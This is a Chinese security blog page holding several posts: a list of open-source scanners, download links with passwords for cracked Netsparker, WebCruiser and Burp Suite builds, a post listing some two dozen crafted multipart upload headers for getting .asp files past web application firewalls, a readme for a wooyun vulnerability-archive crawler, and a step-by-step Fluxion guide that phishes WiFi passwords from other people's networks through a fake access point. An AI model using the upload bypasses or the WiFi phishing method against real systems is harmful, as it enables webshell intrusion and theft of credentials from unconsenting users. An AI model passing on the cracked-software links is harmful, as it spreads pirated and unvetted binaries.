欢迎光临
我们一直在努力
"

Scanners-Box:开源扫描器大全 2017-04-22

legend阅读(268)评论(0)

Scanners-Box是一个集合github平台上的安全行业从业人员自研开源扫描器的仓库,包括子域名枚举、数据库漏洞扫描、弱口令或信息泄漏扫描、端口扫描、指纹识别以及其他大型扫描器或模块化扫描器;该仓库只收录各位网友自己编写的一般性开源扫描器,类似nmap、w3af、brakeman等知名扫描工具不收录


子域名枚举

数据库扫描

弱口令或信息泄漏扫描

物联网设备扫描

XSS扫描

企业网络自检

webshell检测以及病毒分析工具

内网渗透

端口扫描、指纹识别以及中间件扫描

专用扫描器

无线网络渗透、扫描

代码静态扫描、代码运行栈跟踪

模块化扫描、综合扫描器

APT


收集目的

本仓库收集的初衷是为向各类企业安全从业人员提供在企业信息安全防护体系建设过程中可以参考的开源安全扫描工具,以期望企业能够利用这些扫描器对自身业务进行自检,从而提高自身业务安全性

项目维护

Wester(sina weibo @西风微雨_Wester) && Martin(sina weibo @Mart1n_ZHOU)

转载 https://github.com/We5ter/Scanners-Box

转载请注明: 转载自Legend‘s BLog

本文链接地址: Scanners-Box:开源扫描器大全 2017-04-22

Netsparker 4.8.1.14376 Crack

legend阅读(308)评论(0)

更新日志:
为Apache Struts框架漏洞添加了新的漏洞检查。
改进

为“抓取的网址列表”,“扫描的URL(s)列表”和“漏洞列表”报告模板添加了JSON格式选项。
MySQL数据库改进的盲注SQL注入检测。
修复

修复了针对根证书报告的不正确的弱签名算法。
修复了报告策略编辑器上的破坏的编辑功能。
修复扫描期间的空活动列表问题。
修复了导入扫描时缺少的自定义Cookie问题。

下载地址:http://pan.baidu.com/s/1cs2Mlw 密码:50mq

转载请注明: 转载自Legend‘s BLog

本文链接地址: Netsparker 4.8.1.14376 Crack

上传绕过WAF

legend阅读(960)评论(0)

默认状态
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; filename=”a.asp”
Content-Type: text/html[/mw_shl_code]

突破0
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; filename=”[0x09]a.asp”
Content-Type: text/html[/mw_shl_code]

突破1 去掉双引号
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; filename=a.asp
Content-Type: text/html[/mw_shl_code]

突破2 添加一个filename1
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; filename=”a.asp”;filename1=”test.jpg”
Content-Type: text/html[/mw_shl_code]

突破3 form中间+
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: f+orm-data; name=”filepath”;filename=”test.asp”
Content-Type: text/html[/mw_shl_code]

突破4 大小写
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data; name=”filepath”; filename=”a.asp”
Content-Type: text/html[/mw_shl_code]

突破5 去掉form-data
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: name=”filepath”; filename=”a.asp”
Content-Type: text/html[/mw_shl_code]

突破6 在Content-Disposition:后添加多个空格 或者在form-data;后添加多个空格
[mw_shl_code=bash,true][mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data; name=”filepath”; filename=”a.asp”
Content-Type: text/html[/mw_shl_code][/mw_shl_code]

突破7 a.asp . (空格+.)
[mw_shl_code=bash,true][mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data; name=”filepath”; filename=”a.asp .”
Content-Type: text/html[/mw_shl_code][/mw_shl_code]

突破8 “换行
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data; name=”filepath”; filename=”a.asp

Content-Type: text/html[/mw_shl_code]

突破9 NTFS流
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data; name=”filepath”; filename=”test.asp::$DATA”
Content-Type: text/html

——WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data; name=”filepath”; filename=”test.asp::$DATA\0x00\fuck.asp0x00.jpg”
Content-Type: text/html[/mw_shl_code]

突破10 经过对IIS 6.0的测试发现,其总是采用第一个Content-Disposition中的值做为接收参数,而安全狗总是以最后一个Content-Disposition中的值做为接收参数。因此尝试构造如下请求[上传test.asp成功]:
[mw_shl_code=bash,true]Content-Disposition: form-data; name=”FileUploadName”; filename=”test.asp”

—————————–15377259221471

Content-Disposition: form-data; name=”FileUploadName”; filename=”test.txt”

Content-Type: application/octet-stream

Content-Disposition: form-data; name=”FileUploadName”; filename=”test.asp”
Content-Disposition: form-data;
name=”FileUploadName”; filename=”test.asp”[/mw_shl_code]

突破11 换位
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Type: text/html
ConTent-Disposition: form-data; name=”filepath”; filename=”a.asp”[/mw_shl_code]

       在上述的方法中,还有些方法可以过安全狗,也可以过D盾、360网站卫士等等。另外从上述方法中,若按你们的想法,会分成那些类型?我在这里统一划分为特性和WAF解析不当(PS下,我不是学术派,较口语化)i,特性包括系统特性,协议特性等等,比如上述中,大多数都属于协议的特性,因为FORM-DATA的协议十分松散;部分属于系统特性,比如加空格、点号、NTFS流等等。而解析不当,比如上述的第二种添加一个filename1,这种在正常情况下无法使用的,如果第0种,对特殊字符无法解析,归根到底也是WAF对内容解析的不当处理。
针对于特性,在上传这一块,好像能用到的就只有系统特性和协议特性,系统特性从系统出现到现在才挖掘出那么一点点,对于我等菜鸟而言,就更难挖掘了。于是我们就把目光放到协议上。

默认状态
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; filename=”a.asp”
Content-Type: text/html[/mw_shl_code]

上述方法我们已经开始测试,那么,有没有想过。既然你们想得到用window特性来+空格,有没有想过用协议来+-空格

突破方法001
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition:form-data; name=”filepath”; filename=”a.asp”
Content-Type: text/html[/mw_shl_code]

突破方法002
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition:  form-data; name=”filepath”; filename=”a.asp”
Content-Type: text/html[/mw_shl_code]

突破方法003
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; filename=”a.asp”
Content-Type:text/html[/mw_shl_code]

突破方法004
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; filename= “a.asp”
Content-Type:text/html[/mw_shl_code]

突破方法005
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data;  name=”filepath”; filename=”a.asp”
Content-Type: text/html[/mw_shl_code]

上述就5种方法了,然后呢,空格可以,谁可以代替空格,tab?咱们来试试
突破方法006
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition:     form-data; name=”filepath”; filename=”a.asp”
Content-Type: text/html[/mw_shl_code]

突破方法007
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data;      name=”uploaded”; filename=”a.asp”
Content-Type: text/html[/mw_shl_code]

突破方法008
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; filename=    “a.asp”
Content-Type: text/html[/mw_shl_code]

上面的方法可以延伸很多种了,记住一点,什么可以替换空格!

接下来,我们在根据之前公布的方法 ,大小写
突破方法009
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-disposition: form-data; name=”filepath”; filename=”a.asp”
Content-Type: text/html[/mw_shl_code]

突破方法010
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: Form-data; name=”filepath”; filename=”a.asp”
Content-Type: text/html[/mw_shl_code]

突破方法011
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; Name=”filepath”; filename=”a.asp”
Content-Type: text/html[/mw_shl_code]

突破方法012
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; Filename=”a.asp”
Content-Type: text/html[/mw_shl_code]

突破方法013
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; filename=”a.asp”
Content-type: text/html[/mw_shl_code]

然后,这里在针对一个漏洞结合下,记得form-data中见存在一个+号吗,为什么不能放到前面或者后面

突破方法014
[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: +form-data; name=”filepath”; filename=”a.asp”
Content-Type: text/html[/mw_shl_code]

突破方法015

[mw_shl_code=bash,true]——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data+; name=”filepath”; filename=”a.asp”
Content-Type: text/html[/mw_shl_code]

        列举了15种方法,不过也才3个技巧,我们也仅仅拿安全狗做演示,但是方法可以绕过目前大部分waf了,即使防住了,结合下有时候会出现超乎想像的结果。另外说下,其他的方法,还有不下20种,我记得某一妹子和我讲过,hack技术在于mind,不受约束,你会发现更多好玩的。
对于解析这块,就靠大家自己去fuzz了,放出来就淹死啦!

转载请注明: 转载自Legend‘s BLog

本文链接地址: 上传绕过WAF

WebCruiserWVS 3.5.4特别版

legend阅读(972)评论(0)

WebCruiser Web漏洞扫描器,一个有效和强大的Web渗透测试工具,将帮助您审计您的网站!
它可以支持扫描网站以及POC(概念验证)的Web漏洞:SQL注入,跨站脚本,本地文件包含,远程文件包含,重定向,废弃备份等。
与其他Web漏洞扫描程序相比,WebCruiser最典型的功能是WebCruiser Web漏洞扫描程序专注于高风险漏洞,WebCruiser可以单独扫描指定的漏洞类型,指定的URL或指定的页面,而其他通常不会 。

WebCruiser Web Vulnerability Scanner V3.5.4新功能:CSRF令牌的强力工具优化。

首先说明毕竟国人写的支持下国货如果喜欢请支持正版,工具很小巧,方便所以我一直都在用。发现没人发布最新版的然后就顺手放出我自己crack的版本,给需要的人吧!

原版也附带一起打包。欢迎大家一起交流!

具体使用说明,已内置—_—!

链接:http://pan.baidu.com/s/1eSMJhcA 密码:fgdr

转载请注明: 转载自Legend‘s BLog

本文链接地址: WebCruiserWVS 3.5.4特别版

安全行业从业人员自研开源扫描器合集

legend阅读(2150)评论(0)

简介

Scanners-Box是一个集合github平台上的安全行业从业人员自研开源扫描器的仓库,包括子域名枚举、数据库漏洞扫描、弱口令或信息泄漏扫描、端口扫描、指纹识别以及其他大型扫描器或模块化扫描器;该仓库只收录各位网友自己编写的开源扫描器,类似nmap、w3af、brakeman等知名扫描工具不收录。

Author:We5ter,Martin

项目主页:https://github.com/We5ter/Scanners-Box

非常欢迎大家贡献commit!

子域名枚举类

数据库漏洞扫描类

弱口令或信息泄漏扫描类

xss扫描器

企业网络自检

端口扫描、指纹识别类

专用扫描器

综合类

*转载请注明来自MottoIN

转载请注明: 转载自Legend‘s BLog

本文链接地址: 安全行业从业人员自研开源扫描器合集

Burp 1.7.1双手奉上

legend阅读(1104)评论(0)

1480924498-7286-1-31

 

众所周知,Burp Suite是响当当的web应用程序渗透测试集成平台。从应用程序攻击表面的最初映射和分析,到寻找和利用安全漏洞等过程,所有工具为支持整体测试程序而无缝地在一起工作。平台中所有工具共享同一robust框架,以便统一处理HTTP请求、持久性、认证、上游代理、日志记录、报警和可扩展性。
BurpSuite允许攻击者结合手工和自动技术去枚举、分析、攻击Web应用程序。

1480924496-1429-1-32

具体新增那些个功能自己查看~~~~

下载地址
链接: 链接: https://pan.baidu.com/s/1eS9iijS 密码: g643
解压密码 secz.org

转载请注明: 转载自Legend‘s BLog

本文链接地址: Burp 1.7.1双手奉上

乌云公开漏洞、知识库爬虫和搜索(下面有彩蛋)

legend阅读(4687)评论(0)

wooyun_public

crawl and search for wooyun.org public bug(vulnerability) and drops

index search

1.安装相关组件

  • python 2.7和pip
  • mongodb
  • scrapy (pip install scrapy)
  • flask (pip install Flask)
  • pymongo (pip install pymongo)

2.爬虫

  • 在爬取内容时,请先启动mongodb数据库:mongod &
  • 乌云公开漏洞和知识库的爬虫分别位于目录scrapy/wooyun和scrapy/wooyun_drops
  • 运行scrapy crawl wooyun -a page_max=1 -a local_store=false -a update=false,有三个参数用于控制爬取:

    -a page_max: 控制爬取的页数,默认为1,如果值为0,表示所有页面

    -a local_store: 控制是否将每个漏洞离线存放到本地,默认为false

    -a update:控制是否重复爬取,默认为false

  • 第一次爬取全部内容时,用scrapy crawl wooyun -a page_max=0 -a update=true
  • 平时只爬取最近的更新时,用scrapy crawl wooyun -a page_max=1,可以根据自己的爬取频率和网站更新情况调整page_max的值
  • 全部公开漏洞的列表和每个漏洞的文本内容存在mongodb中,大概约2G内容;如果整站爬全部文本和图片作为离线查询,大概需要10G空间、2小时(10M电信带宽);爬取全部知识库,总共约500M空间。(截止2015年10月)

3.搜索

  • 漏洞搜索使用了Flask作为web server,bootstrap作为前端
  • 在搜索时,请确定已启动了mongodb数据库:mongod &
  • 启动web server :在flask目录下运行python app.py,默认端口是5000
  • 搜索:在浏览器通过http://localhost:5000进行搜索漏洞,多个关键字可以用空格分开。

4.为mongodb数据库创建索引(可选,以下为命令行操作)

5.虚拟机

  • 虚拟机1:在2016年6月底爬的wooyun全部漏洞库和知识库内容,总共30G。上传的文件有点问题,分卷有错误,我正在重新上传一次,7月29号应该能传完,请暂时不要下载这一个!请暂时不要下载这一个!请暂时不要下载这一个!(网盘地址为: http://pan.baidu.com/s/1o7IEaAQ 提取密码:d4cq)
  • 虚拟机2:已打包了一个安装了所有组件和程序的虚拟机(不包含具体内容),网盘地址为:http://pan.baidu.com/s/1sj67KDZ 密码:bafi
  • 使用方法:

6.其它

burpsuite 1.7.03最新破解版

legend阅读(4493)评论(0)

QQ截图20160315112632

Burp Suite 是用于攻击web 应用程序的集成平台。它包含了许多工具,并为这些工具设计了许多接口,以促进加快攻击应用程序的过程。所有的工具都共享一个能处理并显示HTTP 消息,持久性,认证,代理,日志,警报的一个强大的可扩展的框架。本文主要介绍它的以下特点:

1.Target(目标)——显示目标目录结构的的一个功能
2.Proxy(代理)——拦截HTTP/S的代理服务器,作为一个在浏览器和目标应用程序之间的中间人,允许你拦截,查看,修改在两个方向上的原始数据流。
3.Spider(蜘蛛)——应用智能感应的网络爬虫,它能完整的枚举应用程序的内容和功能。
4.Scanner(扫描器)——高级工具,执行后,它能自动地发现web 应用程序的安全漏洞
5.Intruder(入侵)——一个定制的高度可配置的工具,对web应用程序进行自动化攻击,如:枚举标识符,收集有用的数据,以及使用fuzzing 技术探测常规漏洞
6.Repeater(中继器)——一个靠手动操作来触发单独的HTTP 请求,并分析应用程序响应的工具。
7.Sequencer(会话)——用来分析那些不可预知的应用程序会话令牌和重要数据项的随机性的工具。
8.Decoder(解码器)——进行手动执行或对应用程序数据者智能解码编码的工具。
9.Comparer(对比)——通常是通过一些相关的请求和响应得到两项数据的一个可视化的“差异”。
10.Extender(扩展)——可以让你加载Burp Suite的扩展,使用你自己的或第三方代码来扩展Burp Suit的功能。
11.Options(设置)——对Burp Suite的一些设置网盘下载

转载请注明: 转载自Legend‘s BLog

本文链接地址: burpsuite 1.7.03最新破解版

运用Fluxion高效破解WiFi密码

legend阅读(2892)评论(0)

Fluxion是一个无线破解工具,这个工具有点像是Linset的翻版。但是与Linset比较起来,它有着更多有趣的功能。目前这个工具在Kali Linux上可以完美运行。

工作原理

1.扫描能够接收到的WIFI信号

2.抓取握手包(这一步的目的是为了验证WiFi密码是否正确)

3.使用WEB接口

4.启动一个假的AP实例来模拟原本的接入点

5.然后会生成一个MDK3进程。如果普通用户已经连接到这个WiFi,也会输入WiFi密码

6.随后启动一个模拟的DNS服务器并且抓取所有的DNS请求,并且会把这些请求重新定向到一个含有恶意脚本的HOST地址

7.随后会弹出一个窗口提示用户输入正确的WiFi密码

8.用户输入的密码将和第二步抓到的握手包做比较来核实密码是否正确

9.这个程序是自动化运行的,并且能够很快的抓取到WiFi密码

使用步骤

原理说完了,那么接下来说说使用步骤吧。这个工具已经被发布在Github上,大家可以前往下载。

git clone https://github.com/deltaxflux/fluxion.git

通过以下命令开启Fluxion。

./fluxion

1466920794-6560-OOjVn6lGsGqvJ8vTK1xpVfS5FbfQ

Fluxion开启页面

随后Fluxion会让我们选择网卡和信道。网卡的话需要大家自己分辨,但是信道选项一般都是选择第一个(全部信道)。

1466920795-3680-CGJQf2lpyjYOqoM0r5O1tYy8sNvw

网卡选择

1466920794-2270-jt6ibeG8KrFd0o4GP4gibNkVAhXA

信道选择

选择完后它会对网卡周围的WiFi进行扫描,扫描到你要破解的WiFi后按Ctrl+C停止。

1466920794-6289-TxJ62OwR4JlKhH40oIia8KWpbj3Q

WiFi扫描

在这一步,我们选择自己想要破解的网络。如果我要破解列表内的第二个网络,那么就输入2。

1466920794-5028-SnuqjYorZII5I2kqBb3lbRL4ZDHA

选择要破解的网络

然后选择第一个选项建立一个虚假的AP。

1466920794-1363-iclbRdqST2zOg3MhJmzTef30oGSA

选择攻击方式

这里会碰到一个选项叫你选择握手包的保存路径。你可以直接空格键跳过,这样握手包会默认保存在/root/Desktop/路径下。随后选择1,其目的是选择aircrack-ng开始抓取握手包。

1466920795-9582-lbrDeaBdL7vib7ZiapHIuDX47ibg

握手包保存路径选项

1466920795-5254-Y1Vcko1OmLoiaF34A9MwAhibiaSA

握手包抓取选项

随后再选择1,这样会使目标WiFi的用户进行统一的一个分配。

1466920795-1958-icF2tricHaPvpYcD0KyMbt2GoaVg

数据包分配

上一个步骤结束之后它会自动打开两个新的终端控制窗口。一个窗口主要是抓取WPA数据包的,而另外一个窗口是分配数据包的。然后我们在原来的窗口上选择1让它继续抓包。

1466920795-7528-IWQwt3Uy9k8a7Vo9mhibNBLSIicA

新打开的两个窗口

抓完包后它会询问你选择一个WEB接口,这里我们选择1。

1466920796-7828-96EyAuaxLFJbMfSFfqmyfwA9ho9g

WBE接口选择

然后它会叫我们选择语言。这里我看了一下没中文版,大家自己看源码改改了。

1466920796-6080-FicMdic8vvrA0jIeSc2DUI6GXYFA

语言选项

选择完语言后它会开启新的四个控制窗口,并且建立虚假的AP,用户分配等操作。

新开启的四个窗口

这时只要用户打开浏览器,就会转到输入WiFi密码的页面。

1466920796-9989-jp4FaRb5UiaCMOaAUx9g6P62l6ww

虚假的WiFi密码输入窗口

只要用户输入正确的WiFi密码,整个程序就会停止运行,并且会自动弹出正确的WiFi密码。

1466920796-6255-3KIjnwO4UrpqibfGQTUjLlc5LfjQ

正确的WiFi密码

总结

突然想起在4年前还拿着BT Linux来跑pin码破解WiFi,经常一跑就是一个晚上。还是社工破解WiFi更加靠谱。

转载请注明: 转载自Legend‘s BLog

本文链接地址: 运用Fluxion高效破解WiFi密码

无觅相关文章插件,快速提升流量